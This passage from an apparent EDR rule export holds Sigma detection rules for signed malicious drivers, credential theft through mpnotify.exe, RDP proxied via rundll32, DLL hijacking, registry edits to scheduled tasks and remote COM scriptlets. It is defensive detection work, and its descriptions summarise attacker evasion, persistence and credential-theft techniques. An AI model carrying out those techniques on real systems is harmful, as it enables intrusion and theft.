'9E7CE1AED4A1C8A985D76BFCD65AC71BFF75430D'\n # https://twitter.com/pr0xylife/status/1595096438798696448\n - 'AAD723780CD440026A6CA0AA1E9D13D09F877E8F'\n # https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - '848C69A831D3789FA2BF6D7A7C8591F80A8F7FCB'\n - 'A8F9B64E4C5CC2AFE5E82DC3C9F44A1BDA2ED4B1'\n - '520CD357E195B57E0BFE7AF87227F4C0737E6BDE'\n - 'DBEB38C344441CB35FF982D1301A1C3DF992E140'\n - '60EE3FC53D4BDFD1697AE5BEAE1CAB1C0F3AD4E3'\n - 'AF5A136DCCED63DEFC29502FEDE9BFF7E2C16A8C'\n - '3A1CE9C2EE30EE8D8883DFC5BF45FF0201C2AB5D'\n # https://twitter.com/ESETresearch/status/1594937059348992001\n - '6EF192CBD6E540F1D740D1BD96317ACAE8C6AF9D'\n # https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/\n - '68FF94B5C77481CC3AB10A05F3C926711C9C5F93'\n # https://twitter.com/SquiblydooBlog/status/1660782805687865344\n - '84F120783C24B1300ADD782414901503AF2F964A'\n # https://twitter.com/jaydinbas/status/1646475092006785027\n - '6ADE753659F5624D5A5D747523F07E23CAD9E65C'\n # https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - '9EEEF1B33142106A095364DD0B2BFC8A24A2A563'\n # https://www.virustotal.com/gui/file/56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c/details\n - '0DD4552A9AABC00F61E619F4812DAFADCAA48715'\n # https://blog.talosintelligence.com/old-certificate-new-signature/\n - '6BC9649368643760190234FBB8395F4CACC2C9CB' # WoSign Class 3 Code Signing CA - 绍兴易游网络科技有限公司\n - '8B91C4BA4546F16D407CEB58090E1C8D82CAF2AC' # thawte SHA256 Code Signing CA - 北京汇聚四海商贸有限公司\n - 'FE6885F629D920DCE90FB03F0DB7B95709811C0D' # thawte SHA256 Code Signing CA - 善君 韦\n - 'F981DB345F885899FAE9382D7D3BCAF75B1CE797' # VeriSign Class 3 Code Signing 2010 CA - Beijing Chunbai Technology Development Co., Ltd\n - 'C61A221389C98EE2FBC0E57A62DEE5A915E6C509' # VeriSign Class 3 Code Signing 2010 CA - Fuqing Yuntan Network Tech Co.,Ltd.\n - '7B69FF55D3C39BD7D67A10F341C1443425F0C83F' # VeriSign Class 3 Code Signing 2010 CA - Zhuhai liancheng Technology Co., Ltd.\n - '864FD20B322E8C7CDB0D7AA69C8475F09D602C3D' # VeriSign Class 3 Code Signing 2010 CA - Baoji zhihengtaiye co.,ltd\n - '85C58500333C98954160FCA3EE9A26B659A5F451' # VeriSign Class 3 Code Signing 2010 CA - Jiangsu innovation safety assessment Co., Ltd.\n - 'D715230B535C8937B469632EC6158761FD18AD21' # VeriSign Class 3 Code Signing 2010 CA - Shenzhen Luyoudashi Technology Co., Ltd.\n - 'DF788AA00EB400B552923518108EB1D4F5B7176B' # VeriSign Class 3 Code Signing 2010 CA - Beijing JoinHope Image Technology Ltd.\n - '775141B89F48B71DADC19F13011A46E537E7029C' # Thawte Code Signing CA - NHN USA Inc.\n # https://twitter.com/1ZRR4H/status/1699923793077055821\n # https://bazaar.abuse.ch/sample/1fc7dbbff1ea28f00d8c32de90c2559e4aa3629d26627094e92ff111e1092875/\n - '21A97512A2959B0E74729BE220102AEF1DCF56FD'\n # Koi Loader\n # https://www.virustotal.com/gui/file/a43d460e43d27df91c02292c1e7d5d7920c2b3dc3b2749b1bbc7f28657588947\n - '2A0B1BEDF4CCC933A5FDB885EDA8211F9B258ABE'\n # https://www.elastic.co/security-labs/abyssworker\n - '0786E6A95B9B6FC9495F319AC2E334103AAB292F'\n - '811500AD165F66CAD3E607CD1253A5EDC91CB4D0'\n - 'D01B544CF4A4F901FA496BEA2B3A8F66F9583CB2'\n - '7749BE16F266669D505684E9F002C689706C4295'\n - '00F1435238447BBA9560E2A9A8C781861EBB15BC'\n - 'D36A5F40D62A4CCB0CFF098D0BBFAA30257D487D'\n - 'DA2CFA2262049049A7A2CA8FAF463669F19B8D5F'\n - '45D2D18BCCD270185F012271C1D6B7C890BA7C02'\n - '18760B486C35B6FF79EA5C461313DE2087353FEA'\n # https://x.com/tangent65536/status/1914373135337701588\n - '22EACBF575EA3FF19A6F639E80E8768405C9BDFE'\n # https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/\n # https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor\n - '99201EEE9807D24851026A8E8884E4C40245FAC7' # GLINT SOFTWARE SDN. BHD.\n - 'A2278EB6A438DC528F3EBFEB238028C474401BEF' # Echo Infini Sdn. Bhd.\n - '29338264019B62D11F9C6C4B5A69B78B899B4DF6' # ECHO INFINI SDN. BHD.\n - '17F77710C888E30917F71F7909086BCC2D131F61' # Byte Media Sdn. Bhd.\n - '7533D9D9C5241D0E031C21304C6A3FF064F79072' # ECHO INFINI SDN. BHD.\n - '3B5253A4853056458675B5CB1903C05BC2DBBD1B' # BLACK INDIGO LTD\n - '76C675514EEC3A27A4E551A77ED30FBB0DC43A01' # Summit Nexus Holdings LLC\n # https://www.virustotal.com/gui/file/f9dd0b57a5c133ca0c4cab3cca1ac8debdc4a798b452167a1e5af78653af00c1\n - '9A6EE51A6A437603ACEE9ADC5F1A5F13329A7E59'\n # https://securelist.com/honeymyte-kernel-mode-rootkit/118590/\n # https://www.virustotal.com/gui/file/dc8b123d91a29661c92b0de3d4f06e0ca17b0633b87e45c09245d82bb84f3860\n - '1F33285626E81F4845936C7A2A55A46F6DADA651'\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1b15c2a0-d1d2-4628-a592-e6c9c314baff", "rule_name": "Driver Loaded Signed with Malicious Certificate", "rule_description": "Detects the loading of drivers signed with a certificate that was used by malicious actors.\nThis can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\nIt is recommended to analyze the loaded driver for malicious contents.\n", "rule_creation_date": "2022-07-21", "rule_modified_date": "2025-12-30", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1553.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1b1d99a0-6099-42fb-91b2-87fead258765", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.071746Z", "creation_date": "2026-03-23T11:45:34.071748Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.071752Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.scip.ch/en/?labs.20220217", "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://attack.mitre.org/techniques/T1556/008/" ], "name": "t1556_008_file_dropped_mpnotify.yml", "content": "title: File Written to Disk by mpnotify.exe\nid: 1b1d99a0-6099-42fb-91b2-87fead258765\ndescription: |\n Detects when a file is written to disk by the mpnotify process.\n This may be a consequence of an attacker trying to access users' credentials using a malicious Network Provider.\n It is recommended to investigate the content of the written file, the DLL loaded by the mpnotify process to look for unsigned libraries, as well as indicators of a Network Provider installation.\nreferences:\n - https://www.scip.ch/en/?labs.20220217\n - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\n - https://attack.mitre.org/techniques/T1556/008/\ndate: 2023/08/08\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1556.008\n - attack.t1112\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\mpnotify.exe'\n\n exclusion_citrix:\n Path:\n - '?:\\Program Files\\Citrix\\Secure Access Client\\logs\\nsnp.txt'\n - '?:\\Program Files (x86)\\Citrix\\Secure Access Client\\logs\\nsnp.txt'\n - '?:\\ProgramData\\Citrix\\AGEE\\nsnp.txt'\n - '?:\\Program Files\\Citrix\\Secure Access Client\\logs\\csa_nsnp.txt'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Citrix\\AGEE\\config.js'\n\n exclusion_dell:\n Path: '?:\\Windows\\Temp\\14ADCEAA-576A-45E5-94B5-EE925ED3E963'\n\n exclusion_novell:\n # https://beta.novell.com/documentation/zenworks-2020/zen_fde_agent/data/bryok2g.html\n Path:\n - '*\\PBA.log'\n - '*\\FDE.log'\n - '?:\\Windows\\System32\\ZCredMgr.LOG'\n - '?:\\Windows\\System32\\ZenCredManager.LOG'\n\n exclusion_crypto_key:\n Path:\n - '?:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\3310a4fa6cb9c60504498d7eea986fc2_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\a398a5cd31e2b6b587ab0b426ca6dc4d_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\a398a5cd31e2b6b587ab0b426ca6dc4d_????????-????-????-????-????????????'\n\n exclusion_f5:\n Path: '?:\\Windows\\Temp\\f5netprov.txt'\n\n exclusion_windhawk:\n Path: '?:\\ProgramData\\Windhawk\\Engine\\ModsWritable\\mod-task\\\\*_slick-window-arrangement'\n\n exclusion_zsso:\n Path|startswith: '?:\\Windows\\Temp\\zsso\\ZCredentialManager'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1b1d99a0-6099-42fb-91b2-87fead258765", "rule_name": "File Written to Disk by mpnotify.exe", "rule_description": "Detects when a file is written to disk by the mpnotify process.\nThis may be a consequence of an attacker trying to access users' credentials using a malicious Network Provider.\nIt is recommended to investigate the content of the written file, the DLL loaded by the mpnotify process to look for unsigned libraries, as well as indicators of a Network Provider installation.\n", "rule_creation_date": "2023-08-08", "rule_modified_date": "2025-02-12", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1112", "attack.t1556.008" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1b3ebc5b-072e-4731-938e-df8d4ab5c802", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.083394Z", "creation_date": "2026-03-23T11:45:34.083397Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.083401Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", "https://attack.mitre.org/techniques/T1021/001/" ], "name": "t1021_001_unusual_process_rdp.yml", "content": "title: RDP Connection Initiated by Unusual Process\nid: 1b3ebc5b-072e-4731-938e-df8d4ab5c802\ndescription: |\n Detects an RDP connection initiated by an unusual process.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\n Attackers can proxying RDP traffic via a legitimate windows process such as RunDLL32 to reduce the exposure of their own infrastructure and evade detection.\n It is recommended to analyze the context and user around this RDP connection to determine if this connection is the result of legitimate administrative operations.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2024/02/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n DestinationPort: '3389'\n ProcessOriginalFileName: 'rundll32.exe'\n Initiated: 'true'\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1b3ebc5b-072e-4731-938e-df8d4ab5c802", "rule_name": "RDP Connection Initiated by Unusual Process", "rule_description": "Detects an RDP connection initiated by an unusual process.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nAttackers can proxying RDP traffic via a legitimate windows process such as RunDLL32 to reduce the exposure of their own infrastructure and evade detection.\nIt is recommended to analyze the context and user around this RDP connection to determine if this connection is the result of legitimate administrative operations.\n", "rule_creation_date": "2024-02-22", "rule_modified_date": "2025-04-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1021.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1b4396df-ab50-493f-8787-8ca376e71f09", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.619180Z", "creation_date": "2026-03-23T11:45:34.619182Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.619186Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/", "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_wsmprovhost.yml", "content": "title: DLL Hijacking via wsmprovhost.exe\nid: 1b4396df-ab50-493f-8787-8ca376e71f09\ndescription: |\n Detects potential Windows DLL Hijacking via wsmprovhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wsmprovhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DSROLE.dll'\n - '\\mi.dll'\n - '\\miutils.dll'\n - '\\wsmsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1b4396df-ab50-493f-8787-8ca376e71f09", "rule_name": "DLL Hijacking via wsmprovhost.exe", "rule_description": "Detects potential Windows DLL Hijacking via wsmprovhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1b45b5ab-100f-4546-9d16-1e8f6b6cb22b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.078559Z", "creation_date": "2026-03-23T11:45:34.078561Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.078565Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/netero1010/GhostTask", "https://attack.mitre.org/techniques/T1112/", "https://attack.mitre.org/techniques/T1053/005/" ], "name": "t1112_scheduled_task_updated_registry.yml", "content": "title: Scheduled Task Actions Updated via Registry Modification\nid: 1b45b5ab-100f-4546-9d16-1e8f6b6cb22b\ndescription: |\n Detects the update of scheduled task actions via a manual registry modification.\n Scheduled tasks are often used by attackers as persistence mechanisms.\n To evade detection, they can update an existing scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/netero1010/GhostTask\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2024/01/04\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\\\*\\Actions'\n ProcessImage|contains: '\\'\n\n filter_scheduler:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n\n exclusion_windeploy:\n ProcessCommandLine:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1b45b5ab-100f-4546-9d16-1e8f6b6cb22b", "rule_name": "Scheduled Task Actions Updated via Registry Modification", "rule_description": "Detects the update of scheduled task actions via a manual registry modification.\nScheduled tasks are often used by attackers as persistence mechanisms.\nTo evade detection, they can update an existing scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n", "rule_creation_date": "2024-01-04", "rule_modified_date": "2025-08-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1053.005", "attack.t1112" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1b63e7c7-7ee6-45a2-9107-662ddc98a824", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.091179Z", "creation_date": "2026-03-23T11:45:34.091181Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.091186Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_wowreg32.yml", "content": "title: DLL Hijacking via wowreg32.exe\nid: 1b63e7c7-7ee6-45a2-9107-662ddc98a824\ndescription: |\n Detects potential Windows DLL Hijacking via wowreg32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wowreg32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\devrtl.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1b63e7c7-7ee6-45a2-9107-662ddc98a824", "rule_name": "DLL Hijacking via wowreg32.exe", "rule_description": "Detects potential Windows DLL Hijacking via wowreg32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1b8277e3-f753-4c37-9719-e62bb969c2b3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.627150Z", "creation_date": "2026-03-23T11:45:34.627152Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.627156Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://pentestlab.blog/2020/05/20/persistence-com-hijacking/", "https://github.com/LOLBAS-Project/LOLBAS/blob/master/Archive-Old-Version/OSScripts/Slmgr.vbs.md", "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", "https://attack.mitre.org/techniques/T1216/", "https://attack.mitre.org/techniques/T1112/", "https://attack.mitre.org/techniques/T1546/015/" ], "name": "t1216_com_hijacking_remote_scriptlet_registry.yml", "content": "title: Registry ScriptletURL Modified\nid: 1b8277e3-f753-4c37-9719-e62bb969c2b3\ndescription: |\n Detects the registration of a remote Windows Scripting Components via the ScriptletURL registry key.\n This key defines the remote location of the arbitrary .sct file that will be downloaded and executed when the related COM class will be invoked.\n Attackers can use a remote malicious scriptlet to achieve persistence and evade detection.\n It is recommended to check for other suspicious activities by the process making the registry modification.\nreferences:\n - https://pentestlab.blog/2020/05/20/persistence-com-hijacking/\n - https://github.com/LOLBAS-Project/LOLBAS/blob/master/Archive-Old-Version/OSScripts/Slmgr.vbs.md\n - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/\n - https://attack.mitre.org/techniques/T1216/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2022/11/14\nmodified: 2026/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - attack.t1112\n - attack.persistence\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\CLSID\\{????????-????-????-????-????????????}\\ScriptletURL\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_setuphost:\n ProcessParentImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_dismhost:\n ProcessImage: '?:\\windows\\temp\\\\????????-????-????-????-????????????\\dismhost.exe'\n\n exclusion_tiworker:\n ProcessImage: '?:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\tiworker.exe'\n\n exclusion_update:\n ProcessImage: '?:\\Windows\\System32\\poqexec.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1b8277e3-f753-4c37-9719-e62bb969c2b3", "rule_name": "Registry ScriptletURL Modified", "rule_description": "Detects the registration of a remote Windows Scripting Components via the ScriptletURL registry key.\nThis key defines the remote location of the arbitrary .sct file that will be downloaded and executed when the related COM class will be invoked.\nAttackers can use a remote 